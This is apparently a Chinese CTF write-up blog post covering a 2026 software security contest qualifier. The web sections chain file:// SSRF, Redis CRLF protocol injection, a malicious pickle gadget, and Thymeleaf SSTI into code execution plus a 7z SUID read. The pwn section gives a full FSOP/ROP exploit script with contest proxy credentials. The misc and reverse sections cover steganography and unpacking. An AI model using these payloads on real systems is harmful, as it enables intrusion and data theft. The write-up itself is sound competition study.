Logo
Overview

2026软件安全赛初赛东北赛区题解

March 15, 2026

两个人ak了。

不过…我讨厌国内安全比赛。

web

auth

注册一个用户之后修改头像,avatar_url 支持 file:// 协议,可以任意文件读取,但是没权限读取 /flag,结果经过 base64 后放在头像框内

先读 /app/app.py

avatar_url=file:///app/app.py

发现存在 redis,尝试读 redis 持久化文件 dump.rdb

avatar_url=file:///var/lib/redis/dump.rdb

拿到 Flask secret_key

伪造 admin 的 session cookie 登录

/admin/online-users 会遍历 online_user:* 并反序列化。

虽然用了 RestrictedUnpickler,但放行了 builtins.getattr,而 OnlineUser 在白名单内

可构造 pickle 链:

TEXT
getattr(getattr(getattr(getattr(OnlineUser, "__init__"),"__globals__")"get")("os"),"system")(cmd)

由于目标是:online_user:<user>

需要把该键覆盖成恶意 pickle

利用点仍是 avatar_url:将请求打到 127.0.0.1:6379,通过 CRLF + RESP 进行协议注入,发送:

TEXT
AUTH redispass123
SET online_user:<user> <pickle_payload>
EXPIRE online_user:<user> 3600

通过读取 file:///proc/1/task/1/children,拿到子进程 PID:11 14 20

逐个读 file:///proc/<pid>/cmdline

在 pid=11 看到可疑启动命令:

TEXT
python3 /opt/mcp_service/mcp_server_secure_e938a2d234b7968a885bbbbb63cde7b9.py

直接读这个脚本文件,发现里面存在:

TEXT
SimpleXMLRPCServer(("0.0.0.0", 54321), ...)

暴露方法 execute_command,同时硬编码 token 为 mcp_secure_token_b2rglxd

在容器内执行 xmlrpc.client.ServerProxy("http://127.0.0.1:54321/") 可以调用

所以反序列化命令可以直接写成:

PYTHON
python3 -c "import xmlrpc.client;print(xmlrpc.client.ServerProxy('http://127.0.0.1:54321/').execute_command('mcp_secure_token_b2rglxd','cat /flag'))" >/tmp/mcp_out.txt

最后用任读从 /tmp/mcp_out.txt 中拿到flag

thymeleaf

  1. PRNG 状态泄露

用户注册时会从后端返回一个 PRNG 取值,可以从中获得其内部状态,然后反推回 admin 账号的密码

TEXT
 MASK = (1 << 48) - 1
 LOW47 = (1 << 47) - 1
 
 def prev_candidates(cur):
     base = ((cur & LOW47) << 1) & MASK
     return [base, base | 1]
2. Thymeleaf SSTI

控制器中存在

TEXT
 return "admin :: " + section;

当 Thymeleaf 看到 :: 时,会把它当作 fragment expression 去解析,故此处存在 SSTI 漏洞

在高版本 Thymeleaf 里,直接写 ${...} 通常会被拦,但通过预处理和字面量拼接可以绕过:

TEXT
__|$${...}|__::.x

在通过 SSTI 进行 RCE 的过程中,由于不同 JDK 版本的 Runtime.exec 的多个重载顺序可能不同,需要爆破之后找出可用的重载下标

TEXT
 rt = "''.getClass().forName('java.lang.Runtime').getMethods.?[name=='getRuntime'][0].invoke(null)"
 expr = f"{rt}.getClass.getMethods.?[name=='exec'][{idx}].invoke({rt},'/usr/bin/id')"

RCE 之后进去的用户是 ctf,需要 root 用户才能读取 /flag

3. 7z提权

find suid:

TEXT
 find / -perm -4000 -type f

发现最主要的 7z,最后使用 /usr/bin/7z a -ttar -an -so /flag 直接获得 flag 内容

pwn

MailSystem

  1. 注册13个用户可以把admin指针给覆盖掉从而可以登录
  2. 下界没有考虑导致可以从mail_user_to_user leak到libc,从而覆盖stdout。
  3. 然后栈迁移 -> rop。
PYTHON
from pwn import *
import os, shutil, tempfile
import socket


context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'info'


EXE = './pwn'
LIBC = './libc.so.6'
LD = './ld-linux-x86-64.so.2'


elf = context.binary = ELF(EXE, checksec=False)
libc = ELF(LIBC, checksec=False)


stdout_offset = -7


host = '192.0.100.2'
port = 9999
socks5 = '3.dart.ccsssc.com:26177'
socks_user = '3hm3n1br'
socks_pass = 'tbkzq6tp'




def _normalize_socks5(value: str) -> str:
    if not value:
        return ''
    value = str(value).strip()
    if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
        return ''
    return value




def _normalize_opt(value: str) -> str:
    if value is None:
        return ''
    value = str(value).strip()
    if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
        return ''
    return value




def _enable_socks5(proxy_spec: str, username: str = '', password: str = ''):
    proxy_spec = _normalize_socks5(proxy_spec)
    if not proxy_spec:
        return


    host, sep, port = proxy_spec.rpartition(':')
    if not sep or not host or not port.isdigit():
        raise ValueError(f'Invalid SOCKS5 proxy: {proxy_spec!r}, expected host:port')


    import socks


    username = _normalize_opt(username)
    password = _normalize_opt(password)
    socks.set_default_proxy(
        socks.SOCKS5,
        host,
        int(port),
        username=username or None,
        password=password or None,
    )
    socket.socket = socks.socksocket
    auth_state = 'enabled' if username or password else 'disabled'
    info(f'Using SOCKS5 proxy: {host}:{port} (auth={auth_state})')




def _prepare_loader(path: str) -> str:
    if os.access(path, os.X_OK):
        return path
    dst = os.path.join(tempfile.gettempdir(), 'ld.mail_system')
    if not os.path.exists(dst):
        shutil.copy2(path, dst)
        os.chmod(dst, 0o755)
    return dst




def start():
    if args.REMOTE:
        _enable_socks5(socks5, socks_user, socks_pass)
        io = remote(host, port)
    else:
        ld = _prepare_loader(LD)
        io = process([ld, '--library-path', '.', EXE], stdin=PIPE, stdout=PIPE)
    io.recvuntil(b'Your choice: ')
    return io




def register(io, name: bytes, password: bytes):
    io.sendline(b'2')
    io.recvuntil(b'Input your name: ')
    io.sendline(name)
    io.recvuntil(b'Input your password: ')
    io.sendline(password)
    return io.recvuntil(b'Your choice: ')




def login_user(io, name: bytes, password: bytes):
    io.sendline(b'1')
    io.recvuntil(b'Input your name: ')
    io.sendline(name)
    io.recvuntil(b'Input your password: ')
    io.sendline(password)
    return io.recvuntil(b'Your choice: ')




def login_admin(io):
    io.sendline(b'1')
    io.recvuntil(b'Input your name: ')
    io.send(b'\x00\n')
    io.recvuntil(b'Input your password: ')
    io.send(b'\x00\n')
    return io.recvuntil(b'Your choice: ')




def write_mail(io, data: bytes):
    assert 1 <= len(data) <= 0x100
    io.sendline(b'1')
    io.recvuntil(b'How many bytes do you want to write? (1-256): ')
    io.sendline(str(len(data)).encode())
    io.recvuntil(b'bytes):\n')
    io.send(data)
    return io.recvuntil(b'Your choice: ')




def send_mail(io, dst: int, overwrite: bool = True):
    io.sendline(b'3')
    io.recvuntil(b'Who do you want to send the mail to? (input user ID 1-12)\n')
    io.sendline(str(dst).encode())
    out = io.recvuntil([b'Overwrite? (y/n): ', b'Your choice: '])
    if out.endswith(b'Overwrite? (y/n): '):
        io.sendline(b'y' if overwrite else b'n')
        out += io.recvuntil(b'Your choice: ')
    return out




def logout_user(io):
    io.sendline(b'4')
    return io.recvuntil(b'Your choice: ')




def admin_logout(io):
    io.sendline(b'5')
    return io.recvuntil(b'Your choice: ')




def admin_forward(io, src: int, dst: int, which: int, overwrite: bool = True, final_mode: str = 'prompt'):
    io.sendline(b'4')
    io.recvuntil(b'Enter source user ID (whose mail to forward): (1-12) ')
    io.sendline(str(src).encode())
    io.recvuntil(b'Enter destination user ID (1-12): ')
    io.sendline(str(dst).encode())


    out = io.recvuntil([b'Overwrite? (y/n): ', b'Which mail would you like to forward?\n', b'Your choice: '])
    if out.endswith(b'Overwrite? (y/n): '):
        io.sendline(b'y' if overwrite else b'n')
        out += io.recvuntil([b'Which mail would you like to forward?\n', b'Your choice: '])


    if b'Which mail would you like to forward?' not in out:
        return out


    io.recvuntil(b'Your choice: ')
    io.sendline(str(which).encode())


    if final_mode == 'prompt':
        out += io.recvuntil(b'Your choice: ')
    else:
        out += io.recvrepeat(0.5)
    return out




def ban_user(io, name: bytes, password: bytes, victim_id: int = 8):
    out = login_user(io, name, password)
    if b'Welcome back' not in out:
        raise RuntimeError(f'login failed for {name!r}: {out!r}')


    # 1. Write mail
    # 1 byte
    # content = 'A'
    # 3. Send mail
    # victim_id
    # overwrite = y
    one = b'1\n1\nA3\n' + str(victim_id).encode() + b'\ny\n'


    total = 0
    while True:
        io.send(one * 6)
        total += 6


        out = io.recvuntil(b'Your choice: ', timeout=5)
        out += io.recvrepeat(0.2)


        if b'Account has been banned!' in out:
            success(f'{name!r} banned after {total} sends')
            return out


        if b'Welcome back' in out and b'1. Write mail' not in out:
            raise RuntimeError(f'{name!r} state changed unexpectedly: {out!r}')


        info(f'{name!r} not banned yet, sent={total}')


def takeover_admin(io):
    for i in range(1, 9):
        register(io, f'u{i}'.encode(), f'p{i}'.encode())
    for i in range(1, 6):
        ban_user(io, f'u{i}'.encode(), f'p{i}'.encode())
    for i in range(9, 13):
        register(io, f'u{i}'.encode(), f'p{i}'.encode())
    register(io, b'u13', b'p13')
    out = login_admin(io)
    assert b'Welcome admin!' in out




def leak_libc(io, src_uid: int = 8):
    payload = flat(0xfbad1800, 0, 0, 0) + p16(0xb780)


    admin_logout(io)
    login_user(io, f'u{src_uid}'.encode(), f'p{src_uid}'.encode())
    write_mail(io, payload)
    logout_user(io)
    login_admin(io)


    data = admin_forward(io, src_uid, stdout_offset, 1, final_mode='repeat')
    marker = b'Which mail would you like to forward?\n'
    leak = data.split(marker, 1)[1].split(b'Mail forwarded', 1)[0]


    stdout = u64(leak[0x20:0x28])
    libc_base = stdout - libc.sym['_IO_2_1_stdout_']


    success(f'libc_base = {hex(libc_base)}')
    success(f'stdout    = {hex(stdout)}')
    return libc_base, stdout




def build_stdout_payload(libc_base: int, stdout: int):
    stderr = libc_base + libc.sym['_IO_2_1_stderr_']
    stdin = libc_base + libc.sym['_IO_2_1_stdin_']


    stage2_addr = libc_base + 0x21d000
    wide_data = stdout - 0x50


    setcontext_3d = libc_base + libc.sym['setcontext'] + 0x3d
    read_addr = libc_base + libc.sym['read']
    file_jumps = libc_base + 0x217600
    wfile_jumps = libc_base + 0x2170c0
    lock_ptr = libc_base + 0x21ca70


    d = bytearray(0x100)


    def wq(off: int, val: int):
        d[off:off + 8] = p64(val)


    def wd(off: int, val: int):
        d[off:off + 4] = p32(val & 0xffffffff)


    # known-good stdout template for this libc
    wq(0x00, 0xfbad2887)
    for off in [0x08, 0x10, 0x18, 0x20, 0x28, 0x30, 0x38]:
        wq(off, stdout + 0x83)
    wq(0x40, stdout + 0x84)
    wq(0x48, 0)
    wq(0x50, 0)
    wq(0x58, 0)
    wq(0x60, 0)
    wq(0x68, stdin)
    wq(0x70, 1)
    wq(0x78, 0xffffffffffffffff)
    wq(0x80, 0x0a000000)
    wq(0x88, lock_ptr)
    wq(0x90, 0xffffffffffffffff)
    wq(0x98, 0)
    wq(0xa0, libc_base + 0x21a9a0)
    wq(0xa8, 0)
    wq(0xb0, 0)
    wq(0xb8, 0)
    wd(0xc0, 0xffffffff)
    wq(0xc8, 0)
    wq(0xd0, 0)
    wq(0xd8, file_jumps)
    wq(0xe0, stderr)
    wq(0xe8, stdout)
    wq(0xf0, stdin)
    wq(0xf8, 0)


    # exploit patch:
    #   _IO_wfile_overflow -> _IO_wdoallocbuf -> call [wide_vtable+0x68]
    # with wide_data = stdout-0x50 and wide_vtable = stdout.
    wq(0x00, 0xfbad2085)      # clear _IO_NO_WRITES and clear the 0x800 bit
    wq(0x18, 0)               # wide+0x68 -> rdi = 0
    wq(0x20, stage2_addr)     # wide+0x70 -> rsi = stage2 buffer
    wq(0x38, 0x400)           # wide+0x88 -> rdx = count
    wq(0x48, 0)               # wide+0x98 -> rcx
    wq(0x50, stage2_addr)     # wide+0xa0 -> rsp = stage2 buffer
    wq(0x58, read_addr)       # wide+0xa8 -> return to read
    wq(0x68, setcontext_3d)   # stdout[0x68] == fake_wide_vtable[0x68]
    wq(0x90, stdout)          # wide+0xe0 -> fake wide_vtable = stdout
    wq(0xa0, wide_data)       # _wide_data = stdout-0x50
    wd(0xc0, 1)               # _mode > 0
    wq(0xd8, wfile_jumps)     # use _IO_wfile_jumps


    return bytes(d), stage2_addr




io = start()
takeover_admin(io)
success("stage1 done: fake admin acquired")


libc_base, stdout = leak_libc(io)
stdout_payload, stage2_addr = build_stdout_payload(libc_base, stdout)


rop = ROP(libc)


pop_rdi = rop.find_gadget(["pop rdi", "ret"]).address + libc_base
pop_rsi = rop.find_gadget(["pop rsi", "ret"]).address + libc_base
pop_rdx_r12 = (
    next(
        addr
        for addr, g in rop.gadgets.items()
        if g.insns == ["pop rdx", "pop r12", "ret"]
    )
    + libc_base
)


open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]


flag_addr = stage2_addr + 0x180
buf_addr = stage2_addr + 0x200


stage2 = flat(
    pop_rdi,
    flag_addr,
    pop_rsi,
    0,
    pop_rdx_r12,
    0,
    0,
    open_addr,
    pop_rdi,
    3,
    pop_rsi,
    buf_addr,
    pop_rdx_r12,
    0x100,
    0,
    read_addr,
    pop_rdi,
    1,
    pop_rsi,
    buf_addr,
    pop_rdx_r12,
    0x100,
    0,
    write_addr,
)


stage2 = stage2.ljust(0x180, b"\x00") + b"/flag\x00"
stage2 = stage2.ljust(0x400, b"\x00")


admin_logout(io)
login_user(io, b"u10", b"p10")
write_mail(io, stdout_payload)
logout_user(io)
login_admin(io)


admin_forward(io, 10, stdout_offset, 1, final_mode="repeat")


io.send(b"5\n")
sleep(0.1)
io.send(stage2)


data = io.recvrepeat(2.0)
print(data)
io.interactive()

misc

steg

xxd看一眼

直接删掉前面的东西,libmagic能正常识别了。

但是打不开,图片IDAT CRC爆炸了。把idat拼起来之后错位。

写一个策略尽可能多恢复点东西:

PYTHON
import zlib
from pathlib import Path
from typing import Iterable


from PIL import Image


PNG_SIG = b'\x89PNG\r\n\x1a\n'




def iter_png_chunks(png: bytes):
    if not png.startswith(PNG_SIG):
        raise ValueError('Not a PNG stream')
    off = len(PNG_SIG)
    while off + 12 <= len(png):
        length = int.from_bytes(png[off:off + 4], 'big')
        ctype = png[off + 4:off + 8]
        data_start = off + 8
        data_end = data_start + length
        crc_end = data_end + 4
        if crc_end > len(png):
            break
        yield ctype, png[data_start:data_end], off, crc_end
        off = crc_end
        if ctype == b'IEND':
            break




def get_png_info(png: bytes):
    for ctype, data, _start, _end in iter_png_chunks(png):
        if ctype == b'IHDR':
            if len(data) != 13:
                raise ValueError('Bad IHDR length')
            width = int.from_bytes(data[0:4], 'big')
            height = int.from_bytes(data[4:8], 'big')
            bit_depth = data[8]
            color_type = data[9]
            compression = data[10]
            filter_method = data[11]
            interlace = data[12]


            return {
                'width': width,
                'height': height,
                'bit_depth': bit_depth,
                'color_type': color_type,
                'compression': compression,
                'filter_method': filter_method,
                'interlace': interlace,
                'channels': {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}.get(color_type, 0)
            }
    raise ValueError('IHDR not found')




def paeth_predictor(a: int, b: int, c: int):
    p = a + b - c
    pa = abs(p - a)
    pb = abs(p - b)
    pc = abs(p - c)
    if pa <= pb and pa <= pc:
        return a
    if pb <= pc:
        return b
    return c




def reconstruct_scanline(filter_type: int, filtered: bytes, prior: bytes, channels: int = 3):
    stride = len(filtered)
    recon = bytearray(stride)


    if filter_type == 0:  # None
        recon[:] = filtered


    elif filter_type == 1:  # Sub
        for x in range(stride):
            a = recon[x - channels] if x >= channels else 0
            recon[x] = (filtered[x] + a) & 0xff


    elif filter_type == 2:  # Up
        for x in range(stride):
            recon[x] = (filtered[x] + prior[x]) & 0xff


    elif filter_type == 3:  # Average
        for x in range(stride):
            a = recon[x - channels] if x >= channels else 0
            b = prior[x]
            recon[x] = (filtered[x] + ((a + b) // 2)) & 0xff


    elif filter_type == 4:  # Paeth
        for x in range(stride):
            a = recon[x - channels] if x >= channels else 0
            b = prior[x]
            c = prior[x - channels] if x >= channels else 0
            recon[x] = (filtered[x] + paeth_predictor(a, b, c)) & 0xff


    else:
        raise ValueError(f'Invalid filter type: {filter_type}')


    return bytes(recon)




# Main program
input_file = Path('carved.png')
output_file = Path('carved_repaired.png')


# Read PNG
png_data = input_file.read_bytes()


# Parse PNG info
info = get_png_info(png_data)
width = info['width']
height = info['height']
num_channels = info['channels']


# Extract and concatenate all IDAT chunks
idat_data = bytearray()
idx = 0
while True:
    i = png_data.find(b'IDAT', idx)
    if i < 0:
        break
    if i >= 4:
        length = int.from_bytes(png_data[i - 4:i], 'big')
        data_start = i + 4
        data_end = data_start + length
        if data_end <= len(png_data):
            idat_data.extend(png_data[data_start:data_end])
    idx = i + 1


idat_data = bytes(idat_data)


raw = zlib.decompressobj().decompress(idat_data)
row_len = 1 + num_channels * width
expected = row_len * height
max_delta = len(raw) - expected


# dp
neg = -10 ** 9
prev = [neg] * (max_delta + 1)
prev[0] = 1 if raw[0] <= 4 else 0
parents = []


for r in range(1, height):
    cur = [neg] * (max_delta + 1)
    par = [-1] * (max_delta + 1)


    for d in range(max_delta + 1):
        best = neg
        best_pd = -1
        lo = max(0, d - 12)
        for pd in range(lo, d + 1):
            if prev[pd] > best:
                best = prev[pd]
                best_pd = pd


        if best_pd >= 0:
            idx_offset = d + r * row_len
            if idx_offset < len(raw):
                cur[d] = best + (1 if raw[idx_offset] <= 4 else 0)
                par[d] = best_pd


    parents.append(par)
    prev = cur


def endpoint_score(d):
    base_score = prev[d]
    penalty = abs(d - max_delta) * 0.2
    return base_score - penalty


end_delta = max(range(max_delta + 1), key=endpoint_score)


path = [end_delta]
for r in range(height - 1, 0, -1):
    end_delta = parents[r - 1][end_delta]
    path.append(end_delta)
path.reverse()
stride = num_channels * width


rows = []
prior = bytearray(stride)


for r, d in enumerate(path):
    start = d + r * row_len
    filter_type = raw[start]
    filtered = raw[start + 1:start + 1 + stride]


    try:
        recon = reconstruct_scanline(filter_type, filtered, prior, num_channels)
        rows.append(recon)
        prior = recon
    except ValueError:
        recon = bytes(stride)
        rows.append(recon)
        prior = bytearray(stride)


img_data = b''.join(rows)
img = Image.frombytes('RGB', (width, height), img_data)


img.save(output_file)

拿出来是这样一张。

低位lsb,RGB拼接。能看到zip包。

这里小文件可以用crc32爆破了。

于是恢复出来

TEXT
pass
 is
c1!x
xtLf
%fXY
PkaA

解压flag.txt,0宽字符。。。。01编码,复原。

PYTHON
    zw = ''.join(ch for ch in text if ch in '\u200b\u200c')
    if not zw:
        raise ValueError('no zero-width data found')
    bits = ''.join('0' if ch == '\u200b' else '1' for ch in zw)
    usable = len(bits) // 8 * 8
    raw = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    try:
        return raw.decode('utf-8')
    except UnicodeDecodeError:
        return raw.decode('latin1')

reverse

re1

这里拼了个pyc,拿下来pylingual还原。

PYTHON
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'Payload_To_PixelCode_video.py'
# Bytecode version: 3.7.0 (3394)
# Source timestamp: 2026-01-04 04:02:18 UTC (1767499338)


from PIL import Image
import math
import os
import sys
import numpy as np
import imageio
from tqdm import tqdm
def file_to_video(input_file, width=640, height=480, pixel_size=8, fps=10, output_file='video.mp4'):
    if not os.path.isfile(input_file):
        return None
    file_size = os.path.getsize(input_file)
    binary_string = ''
    with open(input_file, 'rb') as f:
        for chunk in tqdm(iterable=iter(lambda: f.read(1024), b''), total=math.ceil(file_size / 1024), unit='KB', desc='读取文件'):
            binary_string += ''.join((f'{byte:08b}' for byte in chunk))
    xor_key = '10101010'
    xor_binary_string = ''
    for i in range(0, len(binary_string), 8):
        chunk = binary_string[i:i + 8]
        if len(chunk) == 8:
            chunk_int = int(chunk, 2)
            key_int = int(xor_key, 2)
            xor_result = chunk_int ^ key_int
            xor_binary_string += f'{xor_result:08b}'
        else:
            xor_binary_string += chunk
    binary_string = xor_binary_string
    pixels_per_image = width // pixel_size * (height // pixel_size)
    num_images = math.ceil(len(binary_string) / pixels_per_image)
    frames = []
    for i in tqdm(range(num_images), desc='生成视频帧'):
        start = i * pixels_per_image
        bits = binary_string[start:start + pixels_per_image]
        if len(bits) < pixels_per_image:
            bits = bits + '0' * (pixels_per_image - len(bits))
        img = Image.new('RGB', (width, height), color='white')
        for r in range(height // pixel_size):
            row_start = r * (width // pixel_size)
            row_end = (r + 1) * (width // pixel_size)
            row = bits[row_start:row_end]
            for c, bit in enumerate(row):
                color = (0, 0, 0) if bit == '1' else (255, 255, 255)
                x1, y1 = (c * pixel_size, r * pixel_size)
                img.paste(color, (x1, y1, x1 + pixel_size, y1 + pixel_size))
        frames.append(np.array(img))
    with imageio.get_writer(output_file, fps=fps, codec='libx264') as writer:
        for frame in tqdm(frames, desc='写入视频帧'):
            writer.append_data(frame)
if __name__ == '__main__':
    input_path = 'payload'
    if os.path.exists(input_path):
        file_to_video(input_path)
    else:
        sys.exit(1)

简单还原下。

PYTHON
from PIL import Image
import cv2
import math
import numpy as np
from tqdm import tqdm




cap = cv2.VideoCapture("video.mp4")


bits = ""


width=640
height=480
pixel_size=8
fps=10


total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
for _ in tqdm(range(total_frames)):
    ret, frame = cap.read()
    if not ret:
        break
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    for r in range(height // pixel_size):
        for c in range(width // pixel_size):
            x = c * pixel_size
            y = r * pixel_size
            pixel = frame[y + pixel_size // 2, x + pixel_size // 2]
            if np.mean(pixel) < 128:
                bits += "1"
            else:
                bits += "0"
cap.release()


xor_key = "10101010"
recovered_bits = ""


for i in range(0, len(bits), 8):
    chunk = bits[i : i + 8]
    if len(chunk) == 8:
        val = int(chunk, 2) ^ int(xor_key, 2)
        recovered_bits += f"{val:08b}"


data = bytearray()
for i in range(0, len(recovered_bits), 8):
    byte = recovered_bits[i : i + 8]
    if len(byte) == 8:
        data.append(int(byte, 2))


open("1", "wb").write(data)
PYTHON
import hashlib


strs = """8277e0910d750195b448797616e091ad
0cc175b9c0f1b6a831c399e269772661
4b43b0aee35624cd95b910189b3dc231
e358efa489f58062f10dd7316b65649e
f95b70fdc3088560732a5ac135644506
c81e728d9d4c2f636f067f89cc14862c
92eb5ffee6ae2fec3ad71c777531578f
c4ca4238a0b923820dcc509a6f75849b
8fa14cdd754f91cc6554c9e71929cce7
c9f0f895fb98ab9159f51fd0297e236d
336d5ebc5436534e61d16e63ddfca327
eccbc87e4b5ce2fe28308fd9f2a7baf3
cfcd208495d565ef66e7dff9f98764da
a87ff679a2f3e71d9181a67b7542122c
e4da3b7fbbce2345d7772b0674a318d5
e1671797c52e15f763380b45e841ec32
8f14e45fceea167a5a36dedd4bea2543
1679091c5a880faf6fb5e6087eb1b2dc
4a8a08f09d37b73795649038408b5f33
cbb184dd8e05c9709e5dcaedaa0495cf""".splitlines()


maps = {}
for i in range(0,255):
    r = hashlib.md5(chr(i).encode()).hexdigest()
    maps[r] = chr(i)


for s in strs:
    print(maps[s], end="")

re2

类似upx的壳。解压完了走这个地方0x4014E0跳出。

没带windows只能unicorn跑了。需要模拟几个系统函数。

PYTHON
api_stubs = {
    "LoadLibraryA": api_base + 0x100,
    "ExitProcess": api_base + 0x200,
    "GetProcAddress": api_base + 0x300,
    "VirtualProtect": api_base + 0x400,
    "exit": api_base + 0x500,
}

能取出来一个base64。解码是下一个stage。

PYTHON
import base64
import struct
import os
import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *


os.makedirs("out", exist_ok=True)


packed_pe = pefile.PE("challenge.exe")
packed_image = open("challenge.exe", "rb").read()
packed_base = packed_pe.OPTIONAL_HEADER.ImageBase
packed_size = (packed_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF


mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(packed_base, packed_size)
mu.mem_write(packed_base, packed_image[: packed_pe.OPTIONAL_HEADER.SizeOfHeaders])
for packed_section in packed_pe.sections:
    packed_raw = packed_image[
        packed_section.PointerToRawData : packed_section.PointerToRawData + packed_section.SizeOfRawData
    ]
    if packed_raw:
        mu.mem_write(packed_base + packed_section.VirtualAddress, packed_raw)


stack_base = 0x01000000
stack_size = 0x00200000
mu.mem_map(stack_base, stack_size)
mu.reg_write(UC_X86_REG_RSP, stack_base + stack_size - 0x10000)


api_base = 0x03000000
mu.mem_map(api_base, 0x00020000)
api_stubs = {
    "LoadLibraryA": api_base + 0x100,
    "ExitProcess": api_base + 0x200,
    "GetProcAddress": api_base + 0x300,
    "VirtualProtect": api_base + 0x400,
    "exit": api_base + 0x500,
}
for api_stub in api_stubs.values():
    mu.mem_write(api_stub, b"\xC3")


for import_entry in packed_pe.DIRECTORY_ENTRY_IMPORT:
    for import_symbol in import_entry.imports:
        if not import_symbol.name:
            continue
        import_name = import_symbol.name.decode()
        if import_name in api_stubs:
            mu.mem_write(import_symbol.address, struct.pack("<Q", api_stubs[import_name]))


state = {"stop": False, "next_fake": api_base + 0x1000}
dll_handles: dict[str, int] = {}
symbol_addrs: dict[tuple[int, str], int] = {}
addr_to_name: dict[int, str] = {}




def on_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
    if address == 0x4014E0:
        print("reached 0x4014E0", stop)
        user_data["stop"] = True
        mu.emu_stop()
        return


    if address == api_stubs["LoadLibraryA"]:
        print(f"called LoadLibraryA")
        rcx = mu.reg_read(UC_X86_REG_RCX)
        dll_name_bytes = bytearray()
        while True:
            current = mu.mem_read(rcx, 1)[0]
            if current == 0:
                break
            dll_name_bytes.append(current)
            rcx += 1
        dll_name = dll_name_bytes.decode("latin1")
        handle = dll_handles.setdefault(dll_name, api_base + 0x8000 + len(dll_handles) * 0x100)
        rsp = mu.reg_read(UC_X86_REG_RSP)
        ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
        mu.reg_write(UC_X86_REG_RSP, rsp + 8)
        mu.reg_write(UC_X86_REG_RAX, handle)
        mu.reg_write(UC_X86_REG_RIP, ret_addr)
        return


    if address == api_stubs["GetProcAddress"]:
        print(f"called GetProcAddress")
        handle = mu.reg_read(UC_X86_REG_RCX)
        rdx = mu.reg_read(UC_X86_REG_RDX)
        symbol_name_bytes = bytearray()
        while True:
            current = mu.mem_read(rdx, 1)[0]
            if current == 0:
                break
            symbol_name_bytes.append(current)
            rdx += 1
        symbol_name = symbol_name_bytes.decode("latin1")
        symbol_key = (handle, symbol_name)
        if symbol_key not in symbol_addrs:
            fake_addr = user_data["next_fake"]
            user_data["next_fake"] += 0x10
            symbol_addrs[symbol_key] = fake_addr
            addr_to_name[fake_addr] = symbol_name
            mu.mem_write(fake_addr, b"\xC3" * 8)
        rsp = mu.reg_read(UC_X86_REG_RSP)
        ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
        mu.reg_write(UC_X86_REG_RSP, rsp + 8)
        mu.reg_write(UC_X86_REG_RAX, symbol_addrs[symbol_key])
        mu.reg_write(UC_X86_REG_RIP, ret_addr)
        return


    if address == api_stubs["VirtualProtect"]:
        print(f"called VirtualProtect")
        old_protect_ptr = mu.reg_read(UC_X86_REG_R9)
        if old_protect_ptr:
            mu.mem_write(old_protect_ptr, struct.pack("<I", 0x20))
        rsp = mu.reg_read(UC_X86_REG_RSP)
        ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
        mu.reg_write(UC_X86_REG_RSP, rsp + 8)
        mu.reg_write(UC_X86_REG_RAX, 1)
        mu.reg_write(UC_X86_REG_RIP, ret_addr)
        return


    if address in (api_stubs["ExitProcess"], api_stubs["exit"]):
        print(f"called ExitProcess")
        user_data["stop"] = True
        mu.emu_stop()
        return


    if address not in addr_to_name:
        return


    fake_name = addr_to_name[address]
    fake_result = 0
    if fake_name == "GetCurrentProcess":
        fake_result = 114514
    elif fake_name in {"GetCurrentProcessId", "GetCurrentThreadId", "GetTickCount"}:
        fake_result = 1
    elif fake_name == "QueryPerformanceCounter":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, struct.pack("<Q", 1))
        fake_result = 1
    elif fake_name == "GetSystemTimeAsFileTime":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, struct.pack("<Q", 0))
    elif fake_name == "GetStartupInfoA":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, b"\x00" * 0x68)
    elif fake_name == "GetModuleHandleA":
        fake_result = packed_base
    elif fake_name in {
        "VirtualQuery",
        "RtlAddFunctionTable",
        "InitializeCriticalSection",
        "DeleteCriticalSection",
        "EnterCriticalSection",
        "LeaveCriticalSection",
        "SetUnhandledExceptionFilter",
    }:
        fake_result = 1


    rsp = mu.reg_read(UC_X86_REG_RSP)
    ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
    mu.reg_write(UC_X86_REG_RSP, rsp + 8)
    mu.reg_write(UC_X86_REG_RAX, fake_result)
    mu.reg_write(UC_X86_REG_RIP, ret_addr)




mu.hook_add(UC_HOOK_CODE, on_code, state)
mu.emu_start(packed_base + packed_pe.OPTIONAL_HEADER.AddressOfEntryPoint, 0)


loader_dump = bytes(mu.mem_read(packed_base, 0x15000))


blob_start = loader_dump.find(b"TVqQAAMAAAAEAAAA//8A")
print(blob_start)


blob_end = blob_start
while blob_end < len(loader_dump) and loader_dump[blob_end] in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=":
    blob_end += 1


stage2_enc = base64.b64decode(loader_dump[blob_start:blob_end])
open("out/stage2.exe", "wb").write(stage2_enc)

这里做了一次解密。

进去扫一眼大概就知道rc4了。

rc4 key在0x4070C0。可以直接跑,跑完就有.rdata和.hello里的内容。

comment

留言 / 评论

如果暂时没有看到评论,请点击下方按钮重新加载。